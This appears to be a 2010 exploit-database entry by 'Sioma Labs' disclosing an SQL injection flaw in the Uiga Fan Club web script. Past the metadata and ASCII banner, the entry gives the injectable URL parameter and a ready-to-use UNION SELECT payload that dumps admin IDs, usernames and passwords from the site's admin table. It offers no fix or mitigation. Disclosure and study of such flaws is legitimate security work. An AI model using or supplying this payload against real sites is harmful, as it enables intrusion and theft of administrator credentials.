Uiga Fan Club SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Uiga Fan Club SQL Injection Vulnerability
# Published : 2010-03-22
# Author : Sioma Labs
# Previous Title : CMS Openpage (index.php) SQL Injection Vulnerability
# Next Title : PowieSys <= 0.7.7 alpha index.php (shownews) SQL Injection Vulnerability

# Exploit Title: Uiga Fan Club SQL Injection Vulnerability 
# Date: 22/03/2010 
# Author: Sioma Labs
# Site : http://www.scriptdevelopers.net/products/ufc.html
# Software Link: http://www.scriptdevelopers.net/download/uigafanclub.zip
# Version: N/A
# Tested on: Win (Wamp)
# CVE : N/A

 __ _                           __       _         
/ _(_) ___  _ __ ___   __ _    / /  __ _| |__  ___ 
 | |/ _ | '_ ` _  / _` |  / /  / _` | '_ / __|
_  | (_) | | | | | | (_| | / /___ (_| | |_) __ 
__/_|___/|_| |_| |_|__,_| ____/__,_|_.__/|___/
                                                   
												   
Exploit : 
http://site/index.php?view=photos&id=[SQLi]


Example : 
http://localhost/uigafan/index.php?view=photos&id=-7 Union Select 1,2,group_concat(admin_id,0x3a,admin_name,0x3a,admin_password),4,5 from admin--


#Sioma Labs
#siomalabs.com
#Sioma Agent 154